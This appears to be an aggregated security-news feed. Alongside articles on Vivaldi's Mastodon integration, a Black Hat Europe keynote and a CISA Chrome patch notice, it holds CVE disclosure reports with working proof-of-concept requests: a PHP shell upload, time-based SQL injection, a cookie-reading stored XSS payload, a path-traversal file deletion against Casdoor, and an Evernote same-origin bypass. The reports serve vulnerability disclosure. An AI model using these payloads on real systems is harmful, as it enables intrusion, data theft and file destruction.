By Habiba Rashid
From December 7th, 2022, their Mastodon instance, Vivaldi Social, will be integrated into the sidebar of the desktop browser, creating an inbuilt Mastodon client for users.
This is a post from HackRead.com Read the original post: Vivaldi Integrates Mastodon Into its Web Browser

Riding the **Mastodon hype**, Vivaldi recently became the first browser to not only have its own Mastodon instance, Vivaldi Social but to also integrate Mastodon into its newest browser version, Vivaldi 5.6. available on Windows, macOS, and Linux.

In the recent update where the company announced its newest functionality, it also explained how **Mastodon** matched its values to give its users an algorithm-free experience with no surveillance capitalism or data profiling. 

According to the company’s **press release**, From December 7th, 2022, their Mastodon instance, Vivaldi Social, will be integrated into the sidebar of the desktop browser, creating an inbuilt Mastodon client for users. However, users will have the option to add any Mastodon server of their choice to the sidebar.

The new feature does not demand implementation and can be ignored if it is not up your alley. Moreover, the app does not run in the background which means that system resources or valuable bandwidth will not be used unless you open the panel.

Vivaldi Social has expanded to around 11,000 people ever since it went live in mid-November.  Vivaldi’s founder **Jon Stephenson von Tetzchner** explained that they “support the idea of a decentralized federated social media network like Mastodon.” 

Along with the creation of its own Mastodon instance, comes the responsibility of dealing with content moderation but the company remains confident that it has the expertise necessary to tackle the thorny issue. 

1.  **Trust Wallet Launches Browser Extension Wallet for Desktop**
2.  **8 Online Best Dark Web Search Engines for Tor Browser (2022)**
3.  **Improving privacy: Alternative browsers and chrome extensions**
4.  **Meet Plexus, An AI-based Browser Security Solution from LayerX**
5.  **Guardio: Can This Browser Extension Protect You From Cybercrime?**

I’m a student and cybersecurity writer. On a random Sunday, I am likely to be figuring out life and reading Kafka.

Vivaldi Integrates Mastodon Into its Web Browser

Empower buyers and stop fixating about zero-days, conference attendees told

Empower buyers and stop fixating about zero-days, conference attendees told

  

Steps towards building a defendable internet are possible, but to get there the industry needs to accept baseline security regulations and move away from a fixation about zero-day vulnerabilities.

Opening the Black Hat Europe conference on Tuesday, security researcher Daniel Cuthbert praised security improvements gained with the wider adoption of cloud computing, improvements in iOS, and tighter web security controls in Google Chrome, among other developments.

One problem, however, is that these improvements are not feeding down to provide improvements in security practices more generally.

Read more of the latest news about Black Hat conference

Cuthbert posed the question: “Does good security mean a lock-in approach or are we actually capable of building an open, transparent, and yet secure internet for all to enjoy?”

According to Cuthbert, the industry is too fixated on zero-days, despite most cyber-attacks still proving successful using run-of-the-mill techniques such as phishing.

“During Covid we saw a lot of people tear apart products to look for bugs,” Cuthbert said. “A lot of criminals did too.”

There were 32 zero-days recorded in 2019, according to figures cited by Cuthbert. This figure dropped to 30 in 2021 before rising to 70 in 2021.

“Lots of zero-days arise because vendors failed to fix bugs,” according to Cuthbert.

Because zero-day exploits can be a weapon in the hands of cybercriminals or spies, researchers need to be more responsible and release detection methods alongside proof-of-concept exploits when they release research, according to Cuthbert.

**Knee jerk reactions need to stop**

Cuthbert criticized the industry for falling into a cycle of offering tools to overcome the shortcomings of earlier security products rather than attempting to identify and address the root cause of problems.

For example, the shortcomings of first-generation firewalls were addressed with the development of web application firewalls – a class of product that has itself been a source of security problems.

Cuthbert said: “Can we stop the cycle of building tools to fix the tools that aren’t secure enough?”

The researcher also criticized the industry from blaming end users – such as, as he put it, ‘Dave from accounts’ – for falling victim to phishing attacks.

Buyers currently have no meaningful influence on the security of products, a trend that needs to change.

Vendors should also be asked hard questions about threat modeling, supply chain security, and should be pushed to use memory safe languages during the procurement process.

YOU MAY ALSO LIKE Cybersecurity conferences 2022: A rundown of online, in person, and ‘hybrid’ events

Black Hat Europe 2022: A defendable internet is possible, but only with industry makeover

Online Leave Management System v1.0 was discovered to contain an arbitrary file upload vulnerability at /leave_system/classes/SystemSettings.php?f=update_settings. This vulnerability allows attackers to execute arbitrary code via a crafted PHP file.

vulnerability location：There is an arbitrary file upload vulnerability in the "Settings" module in the background management system

    POST /leave_system/classes/SystemSettings.php?f=update_settings HTTP/1.1
    Host: localhost
    Content-Length: 4027
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    Accept: */*
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryTRvq9tuWvBA7y1xY
    X-Requested-With: XMLHttpRequest
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    sec-ch-ua-platform: "Windows"
    Origin: http://localhost
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: http://localhost/leave_system/admin/?page=system_info
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
    Cookie: PHPSESSID=29pn5i5a8eeab4dp29po24hgn5
    Connection: close
    
    ------WebKitFormBoundaryTRvq9tuWvBA7y1xY
    Content-Disposition: form-data; name="name"
    
    Online Leave Management System - PHP
    ------WebKitFormBoundaryTRvq9tuWvBA7y1xY
    Content-Disposition: form-data; name="short_name"
    
    OLMS - PHP
    ------WebKitFormBoundaryTRvq9tuWvBA7y1xY
    Content-Disposition: form-data; name="about_us"
    
    <p style="text-align: center; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding: 0px; font-family: DauphinPlain; font-size: 70px; line-height: 90px;">About Us</p><hr style="margin: 0px; padding: 0px; clear: both; border-top: 0px; height: 1px; background-image: linear-gradient(to right, rgba(0, 0, 0, 0), rgba(0, 0, 0, 0.75), rgba(0, 0, 0, 0));"><div id="Content" style="margin: 0px; padding: 0px; position: relative;"><div id="bannerL" style="margin: 0px 0px 0px -160px; padding: 0px; position: sticky; top: 20px; width: 160px; height: 10px; float: left; text-align: right; color: rgb(0, 0, 0); font-family: " open="" sans",="" arial,="" sans-serif;="" font-size:="" 14px;="" background-color:="" rgb(255,="" 255,="" 255);"=""></div><div id="bannerR" style="margin: 0px -160px 0px 0px; padding: 0px; position: sticky; top: 20px; width: 160px; height: 10px; float: right; color: rgb(0, 0, 0); font-family: " open="" sans",="" arial,="" sans-serif;="" font-size:="" 14px;="" background-color:="" rgb(255,="" 255,="" 255);"=""></div><div class="boxed" style="margin: 10px 28.7969px; padding: 0px; clear: both; color: rgb(0, 0, 0); font-family: " open="" sans",="" arial,="" sans-serif;="" font-size:="" 14px;="" text-align:="" center;="" background-color:="" rgb(255,="" 255,="" 255);"=""><div id="lipsum" style="margin: 0px; padding: 0px; text-align: justify;"></div></div></div><p style="margin-right: 0px; margin-bottom: 15px; margin-left: 0px; padding: 0px; text-align: justify; color: rgb(0, 0, 0); font-family: "Open Sans", Arial, sans-serif;">Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer vel pharetra elit. Suspendisse potenti. Quisque aliquam justo ut ipsum porta ullamcorper. Curabitur ac lectus hendrerit, tristique sem in, cursus sapien. Vivamus metus augue, pharetra ac lobortis vel, eleifend sed diam. Sed lacus mauris, dictum eget est in, maximus egestas arcu. Nunc vel est ut est elementum laoreet. Phasellus quis tincidunt ex. Morbi vestibulum molestie turpis, id pellentesque augue viverra in. Donec laoreet lorem id viverra molestie. Vivamus in odio sed lectus ultricies eleifend. Nunc eget erat blandit, tristique odio nec, blandit purus. Vivamus facilisis laoreet ex, vel ultricies nisl molestie in. Proin laoreet finibus nulla quis auctor. Etiam pulvinar ligula et diam tincidunt dapibus.</p><p style="margin-right: 0px; margin-bottom: 15px; margin-left: 0px; padding: 0px; text-align: justify; color: rgb(0, 0, 0); font-family: "Open Sans", Arial, sans-serif;">Nulla pulvinar nisl nec neque mollis imperdiet. Curabitur dignissim convallis arcu, a maximus neque dictum id. Praesent justo libero, semper sed auctor eu, ultricies id quam. Sed et orci non sem imperdiet lobortis at non mi. Suspendisse consectetur consectetur dolor, interdum imperdiet orci venenatis nec. Sed vehicula orci sollicitudin facilisis ultricies. Mauris non nibh nec orci convallis mollis ac in lectus. Cras eu cursus urna, non semper mi. Ut in tortor in odio feugiat interdum. Integer ut ante non purus luctus maximus eu vitae nulla. Nam quam felis, condimentum non molestie sed, ornare at nunc. In rhoncus mi id justo gravida congue.</p>
    ------WebKitFormBoundaryTRvq9tuWvBA7y1xY
    Content-Disposition: form-data; name="files"; filename=""
    Content-Type: application/octet-stream
    
    
    ------WebKitFormBoundaryTRvq9tuWvBA7y1xY
    Content-Disposition: form-data; name="img"; filename="shell.php"
    Content-Type: application/octet-stream
    
    <?php phpinfo();?>
    ------WebKitFormBoundaryTRvq9tuWvBA7y1xY
    Content-Disposition: form-data; name="cover"; filename="shell.php"
    Content-Type: application/octet-stream
    
    <?php phpinfo();?>
    ------WebKitFormBoundaryTRvq9tuWvBA7y1xY--
    
    

We visited the directory of the file in the browser and found that the code had been executed

CVE-2022-45009: bug_report/UPLOAD.md at main · realguoxiufeng/bug_report

Simple Phone Book/Directory Web App v1.0 was discovered to contain a SQL injection vulnerability via the editid parameter at /PhoneBook/edit.php.

**Simple Phone book/directory Web App v1.0 by bakhtiar has SQL injection**

BUG\_Author: realguoxiufeng

vendors:https://www.sourcecodester.com/php/13011/phone-bookphone-directory.html

Vulnerability File: /PhoneBook/edit.php

GET parameter 'editid' exists SQL injection vulnerability

Payload1: /PhoneBook/edit.php?editid=1'

    GET /PhoneBook/edit.php?editid=1' HTTP/1.1
    Host: localhost
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
    Cookie: PHPSESSID=h2td7dda0p1f3dha0mjlejh9vb
    Connection: close
    

sql statement error

Payload2: /PhoneBook/edit.php?editid=1''

    GET /PhoneBook/edit.php?editid=1'' HTTP/1.1
    Host: localhost
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
    Cookie: PHPSESSID=h2td7dda0p1f3dha0mjlejh9vb
    Connection: close
    

Page successfully displayed

Payload3: /PhoneBook/edit.php?editid=1%27%20AND%20(SELECT%202%20FROM%20(SELECT(SLEEP(10)))A)--%20B

    GET /PhoneBook/edit.php?editid=1%27%20AND%20(SELECT%202%20FROM%20(SELECT(SLEEP(10)))A)--%20B HTTP/1.1
    Host: localhost
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
    Cookie: PHPSESSID=h2td7dda0p1f3dha0mjlejh9vb
    Connection: close
    

The server's response time is 10 seconds

CVE-2022-45010: bug_report/SQLi-1.md at main · realguoxiufeng/bug_report

Online Leave Management System v1.0 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the component /leave_system/admin/?page=maintenance/department. This vulnerability allows attackers to execute arbitrary web scripts or HTML via crafted payload injected into the Name field under the Create New module.

Permalink

**Online Leave Management System v1.0 by oretnom23 has Stored Cross Site Scripting**

BUG\_Author: realguoxiufeng

vendors:https://www.sourcecodester.com/php/14910/online-leave-management-system-php-free-source-code.html

**Steps to reproduce**

Navigate to Department List "/leave\_system/admin/?page=maintenance/department" and Click "Create New"

Paste the below payload on Name fields and click save

    ab<script>alert(document.cookie)</script>cd
    

Transmission packet

    POST /leave_system/classes/Master.php?f=save_department HTTP/1.1
    Host: localhost
    Content-Length: 371
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    Accept: application/json, text/javascript, */*; q=0.01
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryQoouFFx1OqtN678U
    X-Requested-With: XMLHttpRequest
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    sec-ch-ua-platform: "Windows"
    Origin: http://localhost
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: http://localhost/leave_system/admin/?page=maintenance/department
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
    Cookie: PHPSESSID=reimqvb6otjde4joflmctma8a6
    Connection: close
    
    ------WebKitFormBoundaryQoouFFx1OqtN678U
    Content-Disposition: form-data; name="id"
    
    
    ------WebKitFormBoundaryQoouFFx1OqtN678U
    Content-Disposition: form-data; name="name"
    
    ab<script>alert(document.cookie)</script>cd
    ------WebKitFormBoundaryQoouFFx1OqtN678U
    Content-Disposition: form-data; name="description"
    
    abcdef
    ------WebKitFormBoundaryQoouFFx1OqtN678U--
    

Payload will trigger when a user visits on /leave\_system/admin/?page=maintenance/department

CVE-2022-45008: bug_report/XSS-1.md at main · realguoxiufeng/bug_report

Casdoor before v1.126.1 was discovered to contain an arbitrary file deletion vulnerability via the uploadFile function.

Hi,

I was looking at the fix to #1035:  

And I noticed it only fixes the path traversal in file upload, while file deletion is still vulnerable.  
Thus, it's possible to delete any file outside application's webroot:  

POC request:

    POST /api/delete-resource?provider= HTTP/1.1
    Host: localhost:8008
    Content-Length: 363
    sec-ch-ua: "Chromium";v="105", "Not)A;Brand";v="8"
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
    sec-ch-ua-platform: "Windows"
    Content-Type: text/plain;charset=UTF-8
    Accept: */*
    Origin: http://localhost:8008
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: http://localhost:8008/resources
    Accept-Encoding: gzip, deflate
    Accept-Language: en,pl-PL;q=0.9,pl;q=0.8,en-US;q=0.7
    Cookie: casdoor_session_id=93862e25f31761d7cde831cdf4b93f14; Hm_lvt_5998fcd123c220efc0936edf4f250504=1664531159; Hm_lpvt_5998fcd123c220efc0936edf4f250504=1664531383
    Connection: close
    
    {"owner":"built-in","name":"/avatar/../../tmp/test.txt","createdTime":"2022-09-30T09:49:17Z","user":"admin","provider":"app-built-in","application":"app-built-in","tag":"avatar","parent":"CropperDiv","fileName":"admin.jpeg","fileType":"image","fileFormat":".jpeg","fileSize":159547,"url":"/files/avatar/built-in/admin.jpeg?t=1664531357206668083","description":""}

CVE-2022-44942: Arbitrary file delete vulnerability · Issue #1171 · casdoor/casdoor

CISA gives agencies deadline to patch against Google Chrome bug being actively exploited in the wild.

Although details about its real-world impact are vague, the Cybersecurity and Infrastructure Security Agency (CISA) added a Google Chrome flaw to its list of Known Exploited Vulnerabilities Catalog.

Google has already released a fixed version of Chrome browser for Windows, Mac, and Linux users. CISA has given government agencies until Dec. 26 to get a patch in place.

Tracked under CVE-2022-4262, CISA described the Google Chrome V8 Engine flaw as a "type confusion vulnerability." Attackers can exploit this kind of vulnerability by using a specially crafted HTML page to corrupt the heap and crashing the browser. Attackers can also exploit type confusion flaws to execute arbitrary code. An exploit for CVE-2022-4262 already exists in the wild, according to Google.

"Specific impacts from exploitation are not available at this time," CISA added.

Keep up with the latest cybersecurity threats, newly-discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

Subscribe

Google Chrome Flaw Added to CISA Patch List

AutoTaxi Stand Management System v1.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the component search.php.

**Auto/Taxi Stand Management System using PHP and MySQL**

“Auto/Taxi Stand Management System” is a web-based technology that will manage the records of the incoming and outgoing autos and taxis in a parking stand. It’s an easy for Admin to retrieve the data if the auto and taxi has been visited through the number he can get that data“Auto/Taxi Stand Management Project in PHP”  is an automatic system that delivers data processing in very high speed in a systematic manner.

**Project Requirements**

Project Name

Auto/Taxi Stand Management System Project (Using PHP & MYSQLi)

Language Used

PHP5.6, PHP7.x

Database

MySQL 5.x

User Interface Design

HTML, AJAX,JQUERY,JAVASCRIPT

Web Browser

Mozilla, Google Chrome, IE8, OPERA

Software

XAMPP / Wamp / Mamp/ Lamp (anyone)

**Project Modules**

In “Auto/Taxi Stand Management System project”  we use PHP and MySQL database. This is the project which keeps records of the auto and taxi which is going to park in the stand. “Auto/Taxi Stand Management System”  have module i.e., admin and user.

**User**

User can only view the Auto/Taxi stand recipient by using their name and mobile number. number.

**Admin**

**Dashboard**: In this sections, the admin can briefly view the number of auto and taxi entries in a particular period.

**New Auto/Taxi Entry**: In this section, admin add auto and taxi which is going into the stand.

**Manage Auto/Taxi Entry**: In this section, admin can manage incoming and outgoing auto and taxi and the admin can also add parking charges and his/her remarks.

**Reports**: In this section admin can generate auto and taxi entry reports between two dates.

Admin can also update his profile, change the password and recover the password.

****Some of the Project Screens****

**Admin Login**

**Admin Dashboard**

**Auto/Taxi Stand Entry Form**

**Auto/Taxi Stand Receipt**

**How to run the Auto/Taxi Stand Management System Project Using PHP and M**ySQL****

1\. Download the zip file

2\. Extract the file and copy atsms  folder

3.Paste inside root directory(for xampp xampp/htdocs, for wamp wamp/www, for lamp var/www/HTML)

4.Open PHPMyAdmin (http://localhost/phpmyadmin)

5\. Create a database with the name atsmsdb

6\. Import atsmsdb.sql file(given inside the zip package in the SQL file folder)

7\. Run the script http://localhost/atsms

**Credential for admin panel :**  
Username: admin  
Password: Test@123

**View Demo**

**Download Project Source Code**

**Project Report**

Anuj Kumar

Hi! I am Anuj Kumar, a professional web developer with 5+ years of experience in this sector. I found PHPGurukul in September 2015. My keen interest in technology and sharing knowledge with others became the main reason for starting PHPGurukul. My basic aim is to offer all web development tutorials like PHP, PDO, jQuery, PHP oops, MySQL, etc. Apart from the tutorials, we also offer you PHP Projects, and we have around 100+ PHP Projects for you.

CVE-2022-43369: Auto/Taxi Stand Management System Project in PHP | Auto Stand Management Project

An XML external entity (XXE) injection vulnerability in Kwoksys Kwok Information Server before v2.9.5.SP31 allows remote authenticated users to conduct server-side request forgery (SSRF) attacks.

CVE-2022-45326: Kwoksys 2.9.5 XXE

Evernote Web Clipper suffered from a same-origin policy bypass vulnerability. The link to the demo exploit was a 403 at the time of addition and has not been included in this post.

    evernote: extension allows cross-origin iframe communicationI happened to notice that the Evernote Web Clipper (3,000,000+ users) allows any website to bypass the same origin policy.https://chrome.google.com/webstore/detail/evernote-web-clipper/pioclpoplcdbaefihamjohnefbikjilcIf you send a message like window.postMessage({type: \"EN_request\", name: \"EN_SerializeTo\", data: { frameName: id }), the frame DOM is collected and then posted back to the top window.I made a quick demo exploit: https://lock.cmpxchg8b.com/oov6Wahv.htmlI notice the evernote website requests that all vulnerabilities are submitted via HackerOne, but I'm unwilling to do that.https://evernote.com/security/report-issueI'll send a report to the Chrome Webstore policy team instead, who can handle contacting the registered developer.Found by: taviso@google.com

Tag

#chrome